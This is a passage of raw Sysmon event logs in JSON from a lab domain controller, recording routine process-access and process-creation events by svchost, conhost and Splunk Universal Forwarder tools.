{A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.950","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3442,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.950\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.950","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3443,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.950\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.950","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3444,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.950\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.950","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3445,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.950\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.950","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3446,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.950\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.950","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3447,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.950\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-023B-5F25-0000-00101D480500}\r\nTargetProcessId: 4356\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.950","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-023B-5F25-0000-00101D480500}","TargetProcessId":"4356","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3448,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.963\r\nProcessGuid: {A837DB8D-023B-5F25-0000-0010DE480500}\r\nProcessId: 4376\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool server list replication_port --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {A837DB8D-023B-5F25-0000-00101D480500}\r\nParentProcessId: 4356\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nParentCommandLine: btool  server list replication_port --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.963","ProcessGuid":"{A837DB8D-023B-5F25-0000-0010DE480500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool server list replication_port --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{A837DB8D-023B-5F25-0000-00101D480500}","ParentProcessId":"4356","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","ParentCommandLine":"btool  server list replication_port --no-log","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3449,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.950\r\nSourceProcessGUID: {A837DB8D-023B-5F25-0000-00101D480500}\r\nSourceProcessId: 4356\r\nSourceThreadId: 4360\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nTargetProcessGUID: {A837DB8D-020F-5F25-0000-001033E90400}\r\nTargetProcessId: 4376\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.950","SourceProcessGUID":"{A837DB8D-023B-5F25-0000-00101D480500}","SourceProcessId":"4356","SourceThreadId":"4360","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","TargetProcessGUID":"{A837DB8D-020F-5F25-0000-001033E90400}","TargetProcessId":"4376","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program 